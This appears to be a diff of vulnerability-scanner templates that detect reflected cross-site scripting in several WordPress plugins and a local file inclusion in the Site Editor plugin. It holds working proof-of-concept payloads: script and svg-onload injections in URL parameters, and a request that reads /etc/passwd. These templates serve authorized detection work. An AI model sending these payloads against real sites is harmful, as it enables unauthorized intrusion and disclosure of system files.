- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E'
- '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -1,19 +0,0 @@
id: wp-site-editor-lfi
info:
name: WordPress Plugin Site Editor 1.1.1 - Local File Inclusion
author: 0x240x23elu
severity: high
reference: https://www.exploit-db.com/exploits/44340
tags: wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body

View File

@ -10,16 +10,16 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%22%3B%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123);</script>"
- "</script><script>alert(document.domain)</script>"
part: body
- type: word

View File

@ -13,13 +13,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3Cscript%3Ealert%281%29%3C/script%3E'
- '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(1)</script>'
- '</script><script>alert(document.domain)</script>'
- type: word
part: header
words:

View File

@ -1,29 +0,0 @@
id: my-calender-xss
info:
name: My Calendar <= 3.1.9 - Unauthenticated Cross-Site Scripting (XSS)
author: dhiyaneshDk
severity: medium
reference: https://wpscan.com/vulnerability/9267
tags: wordpress
requests:
- method: GET
path:
- '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm(%2F{{randstr}}%2F)%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<svg/onload=confirm(/{{randstr}}/)>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200